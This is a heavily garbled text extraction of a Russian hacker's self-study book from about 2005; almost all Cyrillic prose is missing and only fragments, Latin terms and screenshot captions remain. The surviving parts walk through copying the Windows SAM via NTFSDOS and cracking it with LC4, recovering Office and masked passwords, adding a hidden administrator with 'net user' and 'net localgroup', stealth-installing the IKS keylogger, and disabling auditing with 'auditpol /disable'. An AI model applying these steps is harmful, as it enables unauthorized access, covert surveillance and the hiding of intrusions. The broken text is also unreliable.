Самоучитель хакера подробное иилюстрированное руководство

5/28/2018

1/189

5/28/2018

2/189

5/28/2018

3/189

Alex Atsctoy

5/28/2018

4/189

004.056.53(075.8) 32.973.20208781+32.973.2018.2781

Alex Atsctoy.

: . . .: [,] /Alex Atsctoy. .: , 2005. 192 .:. ISBN 5936730360.

CIP

? ,

, .

:www.3st.ruEmail:[email protected]

ISBN 5936730360 , 2005 , 2005 , 2005

5/28/2018

5/189

1. 8

2. W in d o w sZ O O O / X f. 25 . 374. 5 75. f y ay ^ epof c W e b 7 3 6. 8 3 7. X a K U H f l C Q 99 8.W e b ~ c au m o & 1159.AmaKU'PoS 143 .

W i n d o w s 2000/Xf 1601 1 . 176 191

5/28/2018

6/189

1............................................................................................... 8 ............................................... . .................................................. 9

?...................................................................................................10 ...............................................................................................13

................................................................................................ 16 .......................................................................................................16 .................................................................................17 .............................................................................75

Web ........................................................................................................... 19

Web ............................................................................................................20

................................................................................................................21 .............................................................................................21 ................................................................ 22....................................................................................................... 22 .................................................................................................................23

................................................................................................................. 23

2.231 W m d O M S2O O O / X P ............................................... 25 ........................................................................ ................................ 25

...... ...... ...... ...... ..... ...... ...... ...... ...... ...... ...... ...... ...... ...... ..... ...... ...... ...... ..... 26

........................................................................................................................... 27

Windows2000/XP................................................................... 28 SAM .............................................................................................................................. 29 ...............................................................................................30

..............................................................................................................31

Windows 2000 ................................................................................33 ................................................................................................................. 35

................................................................................................................. 36

. & .................................................? ................................................................................. 38

NTFSDOS Pro ......................................................................................................39 SAM .................................................................................................................. 44 ....................................................................................47 ********............................................................................................. 50

......................................................................................... 51 ............................................................................................. 52 .........................................................................................................53

.......................................................................................................53 ................................................................................................ .. 56

5/28/2018

7/189

4. 5 7 58

59

63

66

68 69 70

72

5. & W e b 73 HTML 74

Web 78

81

82

6. 83 83

85 88

89 90 91

96

97

7.ICQ 99 100 ICQ 101

102 IP ICQ 103IC Q 104 ICQ 106I CQ 111

112 113

5/28/2018

8/189

8. We|?~C3UmO& 115 Web 115 Web 116

Web 118 1 19 120

IIS 5 122 123 125

Web Teleport Pro 131

132

136

HTML 138

Web 139

142

9.Ahl3KU" 143 DoS 144

145

145 8 147 Smur f . 14 8

149

151

Nuke 752 Teardrop 154 Ping of Death 154

Land 755

155 DoS 756

159

10. W i n d o w s2 /. TCP/IP 160

162 . 762

165 765

6

5/28/2018

9/189

168

NetBus 169 173

175

. 176 177

PhoneSweep 4.4 178

PhoneSweep 4.4 179

180

782 185

PhoneSweep 186

186 190

5/28/2018

10/189

1 . , , , , ,

. , , . , ( ).

, , .. , , 2 () . .

, :

log:

:

1: 2:

em: email

. , ! . 13.06.1999, .. .

!!!

, http://www.superinternetprovider.ru

, .

, , , , , , , , . , , ,

Web .

5/28/2018

11/189

, . , . ,

, , ,

,

.

,

, .

, , ,

. ,

,

!

, , ,

.

, ,

. ,

80 ,

, ,

, ,

.

.

, ,

, , .

,

, , .

( ), .

(, !)

,

, .

, ,

9

5/28/2018

12/189

, . , , , , , , . , ,

, , , , .

, . ,

. , ,

, , , , , .

, , , .

, , , , , .

20

. ? , , , , , , , , , (, )

, 10

5/28/2018

13/189

. , , .

, ,

. ( ).

, :

(, . ).

, , , .

Hard DISK [ Fdisk.exe] n ( , ) .

! , , !

[ 24% ] , POWER !

IDE .

, . , ,

, , , , , HARD DISK , , , . , Must die, . Windows,

, .

, , . , Windows ? , , ? , , , , .

11

5/28/2018

14/189

, ?

21 ().:

:

, , , , , . , .:

, . . , , , .

: . . , . . , , . .

: , .

, ?

, , ?

, ?

, .

, , ,

, , . . . . , , , (, ,

) . , :

12

5/28/2018

15/189

, 16 19 .

( 80%)

, nerd.

: 1) , ; 2)

. (, ?

).

Windows Unix,

TCP/IP

, ,C++,Perl, Basic. ,

.

,

19 . ,

,

, , .

,

, , . , , , , .

, ,

, .

, , , . ,

. ,

,

, .

.

, ,

,

. ,

.

, , .

, ,

.. , .

,

,

. , 13

5/28/2018

16/189

, ,

, .

, ,

,

,

.

, ,

:

.

,

. ,

, ,

, ,

,

[3]. , ,

, .

,

.

" ,

, ,

,

.

, .

,

, ,

. , , ,

.

14

5/28/2018

17/189

, ,, ,

.

, . ,

, .

, , ,

.

,

,

(.. ,

). ,

, ,

, , ,

. , ,

, , ( rootkit ). U N I X , Windows 2000 , 4,

, , ,

, Windows, , . .

IP,

.

. , ,

, , ,

.

, 4

, ,

.

15

5/28/2018

18/189

,

.

, , . ,

DoS ,

IDS.

.

,

.

, ,

, .

,

,

.

,

. ;

, .

,

, ,

, , .

, ,

,

. , [3]

,

. ,

, [3]

[1].

, (

). ,

16

5/28/2018

19/189

, , . , , , , , . , . , , ,

. , . , ,

, . .

.

Web (, RIPE NCC http://www.ripe.net). Web, Whols, , , .

, , , Web. Yahoo(http://www.yahoo.com), Rambler(http://www.ram bler.ru) . . , , , ,

. , , , [3]. Google(http://www.google.com), . , , C:\WINNT, Wi n dows NT/2000. , .

17

5/28/2018

20/189

, , Teleport Pro. , Web

, ., , HTML Web

, , HTTP . , , , , , ,

, , ( 11 ). , Web , , . , .

, , , . .

, , , , .. , , . SAM(Security Account Manager ), . SAM , 3 , , LOphtCrack LC4 (http://www.atstake.com)., , , , Windows , MS Office . , .

, 3 . Office Password 3.5(http://lastbit.com/download.asp) Windows , , .

Revelation SnadBoy(http://www.snadboy.com). , 18

5/28/2018

21/189

***** ,

, Revelation .

, , , , , , . .

?, , , .

W e l o

. , Web, , .

, Web, Web,

Web , . Web 5 .

,

. , Web, .

. , , 6 Death & Destruction E mail Bomber . , . , , , 6 Brutus.

19

5/28/2018

22/189

, , ICQ.

IP ICQ ( flood )ICQ , ! , 7 ICQ Flooder, I CQMu lt iV ar,

.

,

IP ICQ ICQ,

,

.

,

.

W e bWeb , , ,

DoS, .

, IIS 5 (Internet Information Server ) Microsoft

.

Web

, Web,

HTML

. 8

, , CGIScan

Brutus, IIS

. 9 , DoS.

Web ,

,

Web. , DoS

, , .

Web

, , CGI.,

, .

20

5/28/2018

23/189

TCP/IP , , , , IP,

, . , .

10 SuperScan, foundstone_tools(http://www.foundstone.com).

W2R K (Windows 2000 Resource Kit Windo ws 2000), , W 2 H K (Windows2000HackerTools Windows 2000).

,

, , .

f le pe x& a m , , . , , , .

,

. , , .

. , , , , . SpyNet, .

21

5/28/2018

24/189

, , VPN (Virtual PrivateNetwork ) , , . , , , ,

, .

, W2RK ( Windows 2000) W2HK Windows 2000, . Windows (Explorer) Windows, . , , , password, . [3], , , , . , , , password.txt , ISP.

, , . , NTFS Windows 2000/XP, , ,

PGP Desktop Security.

11~ , , .. . Web ,

(., , http://www.securitylab.ru). 8 IIS. CGIScan

, . ,

22

5/28/2018

25/189

,

, II S4. Web , .

,

, . .

,

; , , ( ). ,

, ,

, .

,

.

,

. 10 NetBUS,

. , .

,

, , .

.

, ,

. , ,

, , ... , , .

, , , ,

. ,

,

( ), ,

? , ,

23

5/28/2018

26/189

,

, ?

, ?

, ,

( ),

, , ,

.

, .

. ,

, ,

,

. , , .

,

,

,

, .... , ,

Windows 2000/XP.

24

5/28/2018

27/189

2 . W i n d o w s/Xf Windows 2000

TCSEC (Trusted Computer System Evaluation

Criteria ) . ,

Windows 2000, ,

.

.

.

.

.

.

, ,

, ,

, , .. ,

.

, ( log in ),

,

. , , ,

, .

Windows NT/2000/XP SAM (SecurityAccount Manager ). SAM

, ,

. SAM

, 3 . ,

.

,

, , .

,

5/28/2018

28/189

, ,

. , , ,

.., , , ,

. , , , (, , ) ,, , .

,

, , , .

Windows NT 4 NTLM(NT LAN Manager NT). NTLM Windows 2000/XP. NTLM, , LM (LAN Manager ),

, Windows

NTLM. Windows 2000/XP Kerberos, , ,

.

Windows 2000/XP,

Windows 2000 Kerberos.

,

Windows 2000/XP . , ,

, ,

.

,

, ,

.

.

Windows

, , ,

. ,

, .

, , ,

, ,

.

2 6

5/28/2018

29/189

Windows 2000/XP , Windows NT/2000/XP .

, . ,

,

.

, , . ,

(Guest), , (User), .

, , ,

.

, (Administrators), ,

, ,

...

u r n,

, .

,

,

, ..

,

. , , . ,

, ,

, ,

.

Windows NT/2000/XP, , ,

.

, 4, ,

, .

,

, , , ,

2 7

5/28/2018

30/189

, ,

.

,

11, , .

, , [2], [6],

,

Windows 2000/XP, , .

W in d o w s 2OOO/XP Windows 2000/XP SRM

(Security Reference Monitor ). SRM

Windows 2000/XP, .. .

Windows2000/XP , ,

SRM. .

LSA (Local Security Authority ),

,

, LSA.

, LSA

. , LSA

, .

SAM (Security Account Manager

),

.

, LSA.

AD (Active Directory ),

AD . ,

LSA. ,

, :

, ,

Kerberos;

, .

, , , :

, ,

28

5/28/2018

31/189

Windows 2000/XP , /, .

SAM AD ,

LSA . ,

, , ..

, SRM., ,

Windows 2000/XP. , . ,

(SAM AD); ,

. ,

.

SAM, , , ,

. , ,

, SAM AD,

. SAM %%\5132\\5, AD %KopHeBoft_KaTanor%\ntds\ntds.dit. , , , . ,

, , ,

, Windows2000/XP. SAM Windows NT 4 ,

NTLM , ,

,

LM,

Windows. LM , SAM

, , LOphtCrack

(http://www.atstacke.com) , .

LOphtCrack

SAM,

, , pwdump

(http://www.atstacke.com). Windows pwdump SAM

, LOphtCrack,

,

LM .

29

5/28/2018

32/189

Service Pack 3 Windows NT 4, , Syskey () , SAM. Windows NT 4 Syskey ; Windows 2000/XP Syskey . LM NTLM Syskey , . , , 34, . , 1 Microsoft,

Microsoft!

Windows. , , .

Windows 2000/XP , , , , , ? .

, , Windows, SID (SecurityIDentifier), 48 , . Win

dows2000/XP SID, Windows 2000 SID. . , , ? (, ..) Windows ACL (Access Control List

), (Access Control Entries

). SID . ACL

30

5/28/2018

33/189

Windows 2000/XP, , (Explorer) Windows,

Windows2000/XP. ACL.

Windows2000/XP (, ) LSA , SID

8 , ., , SRM 8 ACL , , . , , . ,

, ,

. ,

.

ACL

, Windows 2000/XP . , (

, http://www.rootkit.com). ,

ACL ,

,

?

, . ,

, Windows 2000/XP.

Windows NT 4 , .. , Windows 2000/XP ADS

(Active Directory Services). ADS Windows 2000,

Windows 2000 Server.

, ,

.

, , ,

, ADS ,

, ..

. , , IP .

31

5/28/2018

34/189

ADS ,

, ,

.

OU (Organization Units), ,

, , , , ,

, OU. OU

, .. OU

, OU .

Windows 2000/XP , .

,

.

Windows 2000 , ,

Windows 2000 Windows NT. ,

,

.

Windows 2000/XP , . ,

,

.

, ..

.

,

. , domen. : com* .domen, comp2.domen...

, ,

, ,domenl, domen2,... , ,

.

, domenl domen2 , domen2 domenl, domen2 comp1.domen2.domenl, comp2.domen2.domen1, ...compN.domen2.domen1. domenl domen2, forest, . , domenl compl.domenl.forest, comp2.domen1.forest , domen2 compl.domen2.forest, comp2.domen2.forest, .... .

32

5/28/2018

35/189

Windows 2000/XP

, , :

.

(Universal group), , ,

.

(Global Group), , , .

(Local group domain), , .

ACL . . , , AD,

, , .

AD SAM, , SAM. AD , AD, , ( 10 ), AD , , , . , . ,, , Window 2000, . , , LC4

LOpghtCrack .

, , .

W i n d o w s2000 Windows 2000

, . ,

332 5830

5/28/2018

36/189

, , , . , , , [7], , . , ,

, . .

,

,

AD. ,

.

,

.

. ,

. ,

,

,

, ,

, .

, , ,. . , , ,

LM,

LM

( , , [3]). Microsoft NTLM ( Service

Pack 3 Windows NT 4) NTLMv2( Service Pack 4 Windows NT 4)., , Windows 2000 Kerberos, ,

.

.

, Windows 2000/XP Windows

, LM. Windows 2000/XP Kerberos,

NTLM LM.34

5/28/2018

37/189

Windows 2000/XP

TCP 88 ,

Kerberos, .

LM NTLM, LOphtCrack

.

, ,

. , ?

, , ,

.

, ,

. ,

. , , , .

,

.

,

, Windows 2000.

,

Microsoft ,

, . W i n d o w sXP

Windows.

Windows 2000/XP [7], . , ,

,

.

, , Retina,

[7].

35

5/28/2018

38/189

,

. ,

, , VPN (Virtual Private

Network ). VPN ,

. VPN ,

.

, , , ,

(Bruce Schneier),

(Applied Cryptography), .

,

,

, .

, ..

.

Windows 2000/XP , .

SAM, LSA, SRM, ADS, LM, NTLM, Kerberos

.

Windows,

.

Windows 2000/XP, / ADS , Microsoft Press Windows 2000.

36

5/28/2018

39/189

3 & Window 2000/XP, ,

, ,

, ? , 2,

,

,

,

. . ( ,

. .)

,

. ,

,

, ( ...).

, , . ,

, , ,

,

,

( ).

? ,

, .

.

, . ,

, .

, .

, ,

,

Windows. , ,

,

,

.

, , ,

5/28/2018

40/189

(. 1), , . , , , .

, , , Windows BIOS . , Windows2000/XP .

,

(, ). , , MSDOS ! ,

. , BIOS , BIOS . .

, BIOS , NTFS, Windows2000/XP. , MSDOS , .

, , , ( , ! , . , , ),

Windows 2000/XP. NTFSDOS Professional (http://www.winternals.com) Winternals Software LP, NTFS MSDOS. , , Windows2000/XP

. , . NTFSDOSProfessional .

38

5/28/2018

41/189

1515fro NTFSDOS Pro .

Windows NTFSDOS Professional

NTFSDOS Professional Boot Disk Wizard (

NTFSDOS Professional). ,

NTFS. . , FORMAT/SSYSMSDOS. Windows XP Create anMSDOS startup disk ( MSDOS).

> * NTFSDOS Professional(StartProgramsNTFSDOS Professional). (. 3.1).

wizardwillhelpyouinstallV/indowsNT/200DvXPsystem files neededNTFSDOSProfessionalto run from a MSDOS diskette or hard disk

PMC. 3.1. NTFSDOS Pro> Next ().

(. 3.2),

, .

> , Next (),

.

NTFSDOS Pro MS DOS

( 437).

(. 3.3) .

39

5/28/2018

42/189

NTFSDOS ProfessionalBootDiskWizard copies drivers and system files from an existing WindowsNT/20QP/xPinstallationorCDROMto your hard disk or a pair of floppy diskettes.If you wish to create bootable diskettes you must addMSDOSto the diskettesyourself,either before orafterusing thisprogram. Use theFORMAT/Sor SYS commands from a MSDOS shell to makebootable diskettes.

You can also make a bootable diskette on Windows XP by opening MyComputer,selecting the"Format"option fromthe context menuof your diskette drive, and formatting a diskette with the"Createan MSDOS startup disk" option checked.

< Back Next > Cancel J. .2.

NTFSDOSProusesthecharacterset torHieUnited States vers ion of MSDOS(aidepage437) bydefaultSelect any additional character setsyouuse with DOS.Japan,code page 932Korean(Johab).code page 1361Korean,code page 949MSDOS CanadianFrench,code page 863MSDOSIcelandic,codepage 661MSDOS Multilingual (Latin1).code page 650MSDOS Nordic,code page 865MSDOS Portuguese,codepage86MSDOSSlavic (Latin II). code page 852

< Back Next > Cancel

. ..

> Next(). NTFSDOS Pro(.3.4).

WindowsNT/2000/XP, NTFSDOS Pro. , , C:\WINNT, \I386 WindowsN T/2000/XP, Service Pack. Next ().

NTFSDOS Pro (. 3.5).

40

5/28/2018

43/189

Pro uses copies of several fileslocatedin your WindowsNT/200Q/XPm directory.Specifythenameofyour Windows NT/2Q.OOVXPinstallationdirectory,oradirectorycontainingtherequired

WindowsNT/2000system files.|c\ASFRool

5/28/2018

44/189

floppy labelledNTFSDOSProfessional0

PressNextto copy filesID A:V

Next (), (. 3.7).

Copyingfilesto diskette...

Cancel

Puc. 3.7.

(. 3.7) Next

() . Windows XP

NTFSPRO.EXE

, NTFS .

Windows NT/2000 .

NTFSCHK.EXE,

NTFS.

42

5/28/2018

45/189

(. 3.8)

NTFSDOS Professional.

necessaryfiles hovebeencopied.Youmay nowreboottoMSDOSbegin using NTFSDOSP rofessional Edition.

. .8. NTFSDOS Pro

> Finish (), .

NTFSDOS Pro,

. NTFSDOS

Pro . ,

, NTFSPRO.EXE,

NTFS . ,

, MSDOS ,

FAT FAT32,

NTFSDOS Pro .

MSDOS NTFS, Windows 2000/XP . ,

( ), , ,

. ,

, , ,

. ,

, , .

SAM,

, , _/132/1'|.

43

5/28/2018

46/189

5 SAM, SAM.

NTFSDOS Pro, MSDOS SAM

/ K O p e H b _ C M C T e M b i / s y s t e m 3 2 / c o n f i g . , , LC4 LOphtCrack(http://www.atstake.com).

. 3.9 LC4 Import().

Import| Senion HelpIB? Import FromLocal MachineImport From Remote Regist iy..Import From SAM File...

Import From Sniffer...

Import From .LC File...Import From.LCS(LC3)FileImport Frum P W D U M P File...

I File* New Session ( * ). , . 3.9.

> Import I m p o r tFrom SAM File(* SAM). SAM.

> SAM, 13.

> (.3.10) SessionBegin Audit( ) .

44

5/28/2018

47/189

?l@stakeLC4 (UnlilbdllFile View Import S e s t i o n Help .iu \ f t \ _u

lALEX3IALEX(ALEXlALEX3lALEX3lALEX3[ALEX3

AdministratorASPNETGuettH e l p A s s i t t a ntIUSH_ALEX3IWAM_ALEX3NewUzer

emptyempty empty emptyamply" empty

empty

e. ;Od Oh Qm usi a s

CS

mporled 7accounts

Puc. 3.10. SAM , , SAM,

. , .3.11, SAM.

A d n un i i t i a lo iASPNET

GuelHelpAti.tlonlIUSH.ALEX3IWAM.ALEX3NenUter

. 3.11. SAM ! , 007 , , ., , 5 Pentium 2 400 .

45

5/28/2018

48/189

, LC4

.

LC4 AuditingOptions For This Session( ), .3.12.

Dictionary CrackD Enabled Dctionary List [TheDictionaryDeck t e s t s Fo r passwords that are thesameas the words listed in the

word file. This testisveryfastandfindsthe weakest passwords.Dictionary/Brute Hybrid CrackEl Enabled | Characterstoprepend

3 ICharactersto appendCommonletter substitutions (much slower)The Dictionary/Brute Hybrid Crack testsfor passwordsthatare variations of the words inthewordfile. It findspasswordssuch as"Dana99"or"monkeys ".This testisfast andfinds weakpasswords.Brute ForceCrackEl Enabled

D Distributed

Character Set

|AZandO9Custom ClaraclwSetchch*:ttrt

Ptrtli. IOil JThe Brute Force Cracktestsfapasswords thatare made up of thecharactersspecifiedin theCharacterSet. It findspasswordssuch as"WeR3pll6s"a"vC569t12b".Thislestis slow and finds mediumtostrongpasswords.Specify acharacterset with morecharacters to crack strongerpasswords.

OK Cancel

Puc. 3.12. , LC4 :

Dictionary Crack ( ), DictionaryList ( ),

. LC4 , ,

. ,

, , , ,

.., .

Dictionary/Brute Hybrid Crack(/ ), , / , , .

Password???, .

46

5/28/2018

49/189

Brute Force Crack ( ), .

,

. Character Set ( ) ,

Custom (), Custom

Character Set (List each character) ( ( )) . Distributed () . File SaveDistributed ( ) .

LC4

Windows NT/2000/XP. Windows,

Windows 95/98, Pwltool.

'

Windows ,

, .

MS Office

(http://www.elcomsoft.com), OfficePassword 3.5. ,

, *******

Revelation SnadBoy (http://www.snadboy.com). , , AZPR , Passware Kit, http://www.lostpassword.com. Windows ,/,, , Window OfficePassword .

47

5/28/2018

50/189

OfficePassword3.5 OfficePassword3.5 Lotus Organizer,MS Project, MS Backup, Symantec Act, Schedule+, MS Money, Quicke n, MS O ffice Excel, Word, Access, Outlook, ZIP VB A, MS Office.

OfficePassword3.5 . Word password.doc, ?

Password Enter password to openfile\test\password.docII [OK 1CancelPuc . 3.13.

Word

, Windows, password.doc, (. 3.13).

, OfficePassword 3.5 :

OfficePassword (Start Programs * OfficePassword). OfficePassword (. . 3.14).

> Select document MS O ffice.

I OfficePassword" D E M O "File Took Option* Help

1]Selecl document

You can also diaganddropfiles from nternetExplorer onto thiswindow.

>(c)19982001VitasRamanchauskas.LastBitSoftware

5/28/2018

51/189

, .

> , Select recoverymode ( ), . 3.15.

Select l e c o v e rv m o d eJocumentpath:C:\test\passwotddoc (Word)Version :Wotd8.0+ntemal version: 133

Word language : Russian(0419)incryption type: StrongT e x t size : 537

Preview AutomaticOflicePassword automatically selects mostsuitable recovery options. Recoverymay take a

lot of time (up to several months in caseola long password]. About 80%of all passwordscould be recovered within48hours.U seguaranteed recoveryotherwise.

UserdefinedAdjustsettings tooptimize searchfor specificcase.(This option is for advanceduseisonly.)

G uaranteed recovery

Success isg uaranteed Important: please read the documentation. Additional fee mayapply.I Click here to learn

Cancel |Display helpnfo NextPuc. 3.15,

> Select recovery mode ( ) :

Automatic ( ), , Next (), , .

Userdefined ( ), . .

Guaranteed recovery ( ), , , , .

>

Next

l Ol f i c e Passwo i d 'DEM O*P assword found:'007' (without quotes)The passwordh asbeencopied onto the clipboard

Would you like to open the documen t n ow?

L Yes NoPuc. 3.16. !

49

5/28/2018

52/189

(). , ,

(.3.16). OfficePassword 3.5 , ,

. , .

,

,

.

, , 24 28

, . , , .

, ,

,

.

******, ,

, (,

), ,

******. , ,

, .

, , ,

. ,

.

,

,

. ,

, N e t B u s . . 3.17 Revelation Snad (http://www.snadboy.com) NetBus

NetBus.

50

5/28/2018

53/189

* SnadBoy'sRevelation

007

'CrcledV CursorDragto revealpassword | Check For Up dat e )| About Exit

Textol Window Under'Crcled V Cursor(l available) I Copy toclipboard

Status

Revelationactive.Length of available text: 3

iSWORD2000iMycq ^

Change Hoct"Hostinformation

Destination:|SWORD200Hostname/IP: 1.001

TCPport:Username:|AdmnstratorPassword:

RepositionRevelation out of the way when dragging'circledV Always on topWhen minimized, put in System Tray Hide 'How to'instructions

Howto1)Left click and drag (while holding downthe left mouse button) the'circledV2) As you dragthe'circled +' cursoroverdifferent fieldson various windows, the text in the fieldunderthecursor will be displayed in the Text of Window...'box.3) Release the left mouse button when you have revealed the text you desire.

NOTE II the field contains text hidden byasterisks(or some othercharacter),theactualtext will beshown. In some cases the text may actually be asterisks.NOTE Not an of the fields that the cursor passes over will have textthat can berevealed. Checkthe status lightfoi availability of text.

Bright green textavailable (Seelengthof text:' inStatus area)Blight red no text available

Cancel

Puc. 3.17. NetBus Sword2000 !

Revelation . 'Circled+'Cursor ('+') SnadBoy'sRevelation ( . 3.17

Password ()). Revelation, Test of Window Under Circles and Cursor (if available) ( ( ) ) ( ). .3.17, 007 NetB us Sword2000, ( ). ( NetBus) [11]. , , , , . : .

51

5/28/2018

54/189

, 4. , ,

, . , , ,

. , backdoor , , .

&* , , , , .

MSDOS: NET USER < > /ADD, , NETLOCALGROUP < > < > /ADD,

. . 3.18 .

r^JCommand Prompt

NewUser 00 /add| T h e c o m m a n d c o m p l e t e d succe s s fully.

C:\>net localgroupfldministrators N e w U s p r /addI T h e c o m m a n d c o m p l e t e d s u c c e s s f u l l y

Puc.3.18. NewUser

NewUser , , .

, , .

52

5/28/2018

55/189

, .

Windows Startup Document and Settings ( ) , . Startup, All users, .

, , . , ( ) , . IKS (Invisible KeyLoggerStealth ), http://www.amecisco.com.

, . , , .

IKS http://www.amecisco.com, I n v i s i b l eKeyLogger 97 8 10 , .

Win do ws NT/2000/XP, , , 1 'l+ir^n+l0"8"]. IKS

W indows NT/200 0/ XP . , IK S , .

IKS . Webiks2k20d.exe , .3.19.

53

5/28/2018

56/189

DStandard Instal|pStealth Install |DUninslal|

It'srecommendedthatyou use Standard Install if this is your first timein using IKS. Justacceptthedefaultsanddickon"InstalNow"button.OryoucandickonReadreadme M"to get familiarwith the concept of IKSfirst.During a standardinstallationa program directory will becreated; program files will beplaced in the directory. An icon to the log file viewerwillbe placed onthedesktop. NoTilerenaming (stealth features) will take place.

InstallDirectory

|C\ProgremFiles\iksYou need tohevaad ministratorrights on this system foritto installsuccess fully.

rf youwanttouninstalin the future, just run thisprogram(ksinstall.exe)again,dick on the"Unmstall"tab, then "UninstallNow"to automatically uninstall the standard installation.

Readreadme.M

. 3.19. IKS Install Now ( ) . IKS . , IKS , iks.sys, . , dataview.exe, . 3.20.

S et t in g s Help

0FlterOut Arrow KeysDFlterOut Ctrl and Alt KeysRtterOut F1 toF T 2KeysFilter Out All Other Function Keys

U seNotepad Translatet o Text Only

GearLa aClear Binary Log Upon Exit0dearText Log Upon Exit

Import Binary Log From:

SaveTextLogTo:C:\DOCUME~1\ADMINI~1.000\LOCALS I Browse,

Puc. 3.20.

54

5/28/2018

57/189

Go! () , . . 3.20 , , .

, IKS

, . iks.sys K O p e H b _ C H C T e M b i / s y s t e m 3 2 / d r i v e r s , (

Regedt32 .3.21).R e g i s t r y E d i t o r [HKEY LOCAL MACHINE on Lo c nl M nchi

Registry Edit Tree View Security Opt i o ns Window HelpSGemuwaSGpc&I37DRIVERCEJIASICQ GroupwareCOIISADMINIPMkslCDILDAPQIMAP4D32GDIMonitor inetaccsCllnetln(o

Inport

Start:REG_DWORD:0x3Type: REG_DWORD:0 x1

Puc.3.21. Windows (,

The Clean er, ). IKS, Stealth Install( ) (.3.19)

, calc.sys, (, ).

IKS

. 007 StealthMonitor, Web,

, , . Win dows , , , notepad.exe.

55

5/28/2018

58/189

, BIOS, .

, . , , . ,

, , , , ( ), , , .

, , .

Windows 2000/XP . Win do ws 9 x / M e , , PGPDesktop Security, . Windows 9x/Me ,

.

, , , , ? . .

56

5/28/2018

59/189

4.

, ,

,

. , , , ,

, , , ,

. , , , , ,

.

,

. 1 ,

50%

,

, , .

, , ,

. ,

,

, ,

.

,

( ).

,

( ).

, . , , , , . .

5/28/2018

60/189

, , ,

. , ,

,

. ,

privacy .

,

, , , ,

, ,

.

, [10],

(, )

, ,

privacy. ,

, , ,

, , , . .

, , ,

,

,

. ,

.

.

, . ,

, .

, , , ,

.

, .

. ,

Web

, Web

,

.

,

, ,

58

5/28/2018

61/189

(,

).

,, , ,

. ,

? , ,

. :

, . , Web.

, .

,

.

Windows,

(Explorer) , .

,

Win do ws .

,

MS Office.

, , ,

.

?

, .

. ,

,

(Explorer) ,

. , (Delete) Windows , , .

W i n d o w s, , , , , MS Office.

, ,

(Show hidden files and folders)

59

5/28/2018

62/189

(Folder Options) Windows. * (Tools * Folder Options) (. 4.1).

)0 j | |j I

( .| | |

: " " ;D 0 0 ()Q

Q ,/ "

< 1 |

OK I 1I. 4.1.

Word (Delete) Windows , . . 4.2, , Word, , , .

^3 IQPGP

g SecurityI ; DatabaseLSJ I

rf 3.5 (:)& (:)(D:)

: 10 (50 ||

3PGPI]Security5| 5 0 ~ $ . d o c

|~WRL0002.tmp_ ~ W R U > 0 0 4 . t m p|~WRL1120.tmp~WRL19B2.tmp|~WRL3531.tmp

Puc. 4.2. ,

, . , .WB K, 60

5/28/2018

63/189

, ~$. , , , Windows, , , Win do ws . , , , . ?

, MS Office, , , , Norton Utilities. Cleaner Disk Security( ht tp :/ / w w w . th e a b s o l u t e . n e t / s w a r e / i n d e x . h tm l tt C ln d i s k ) . , , , . , . ,

, . , , . ( 100%) .

. 4.3 Clean Disk Se curity 5.01( h t t p :/ / www. t h e a b s o l u t e . n e t / s wa r e /index.html#Clndisk),

,

( ).

Clean Disk Security 5.01

Erasefully ( ).

, , (

. 4.3. Clean Disk Security 5.01

61

5/28/2018

64/189

FAT NTFS). ,

, .

Windows, Windows,

Temp ( , ,

)

. ,

, , (cookie).

,

(. 4.3).

. 4.3, :

Simple () 6 ,

.

; 1 .

NIS 7

(.. ) .

Gutmann 35 (.. ).

(Peter Gutmann)

. .

,

( ).

Test mode ( ) #10

ASCII.

. , Clean Disk Security 5.01

, ,

.

, [10]. , :

(UPS);

. , , .

,

.

62

5/28/2018

65/189

, , .

, ,

. ,

,

, .

,

. ,

, , Norton Util ities,

, / , .

, ,

[10]. ( )

, ,

regedt32.

. ,

,

NTFS.

, ,

,

. ,

Web

.

, , . .

, ,

.

& , ,

.

. ,

.

63

5/28/2018

66/189

, . (). , ,

, .

( Web, , , ), , , , . , , .

(., [5],[10], , , ). , ,

. , , , . , .

, , . .

, . , , ,

. ,

, , , , . , , Web ,

64

5/28/2018

67/189

. HTML Web. Web , , Web, .

,

, Web http://www.privacy.net/analyze, , Web . . 4.4, , Web, .

3lAnalyze YourInternetPrivacy Microsoft Internet Explorer^^ ^ ~ BBSBBBgg ** ^

Your Browser Type and Operating System:

Mozilla/4.0(compatible;MSIE5.01;Windows NT 5.0;MSIECrawler)All Information sent by your web browser when requesting this web page:

Accept: */* AcceptLanguage: ru Connection; keepalive Host: www.privacy.net UserAgent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0; MSIECrawler) Cookie:Date=1/30/2002;Privacy.net=Privacy+AnalysisVia: 1.1 cea15. 1.1proxy.iptelecom.net.ua:3128(Squid/2.4.STABLE3) XForwardedFor: 212.9.232.151,212.9.224.89 CacheControl: maxage=259200

a _ . 4.4. W eb

, ( )

Whols, 1, .

, , IP . Web Web , IP

...

65

3 5830

5/28/2018

68/189

, , Web, ( a n o n ym i z e r ). , Web, ,

. , , http://www.anonymizer.com.(. 4.5).

Anonymiz er.com Onlinu Privacy Sorvic4 1 | U [ ifer

hup.//ww wanonymteBf.coin.Anonymizer.com(|AboutPrivacy

FINDITSTO spyCap ' :. 4.5. Web

Go.

, FTP, , , . , , ,

Web, , . ( ), .

Web , (Proxy server)

(. 4.6).

66

5/28/2018

69/189

' " . ,

D

Q

0 : |www.anonymize| ; J8080 [...D

:::

111

|

. 4.6.

, , ,.. Web , .

.

HTTP, FTP, Web, FTP.

, .

.

. , , , Web, ,Yahoo. proxy+server+configuration+Explorer, Web, , . , , .

67

5/28/2018

70/189

, , , , , , , . , , ,

3 IKS. , , N e t B u s(http://www.netBus.org). , , , , , .

:

, ( ).

IP , , .

, , . , Back Orifice 2000 31337 , , 31336, , , .

,

Windows NT/2000/XP. , auditpol W2RK, , , e lsave.exe ( h tt p :/ / w w w . ib t . k u . d k / j e s p e r / E L S a v e / d e f a u l t . ht m ) . (Event Viewer) Window s2000/XP.

, , (Hidden). Win do ws , .

, .

, 68

5/28/2018

71/189

, , explorer.exe, Windows

Windows.

, EliteWrap,

[11].

( Rootkit ).

,

,

.

.

Tripwire (http://www.tripwiresecurity.com), , Cisco

Systems (http://www.cisco.com)

. Windows 2000/XP , ,

, [7].

, ,

,

, .

,

/ . Windows NT/2000/XP, , auditpol.exe

W2RK. ( )

, .

:

C:\Auditpol>auditpol\\ComputerName /disableRunning...Audit information changed successfully on \\ Comp uterName ...

New audit policy on \\ComputerName ...

(0) Audit Disabled

69

5/28/2018

72/189

System

Logon

Object Access

Privilege Use

Process Tracking

Policy Change

Account Management

Directory Service Access

Account Logon

= No

= No

= No

= No

= Success and Failure

= No

= No

= No

= No

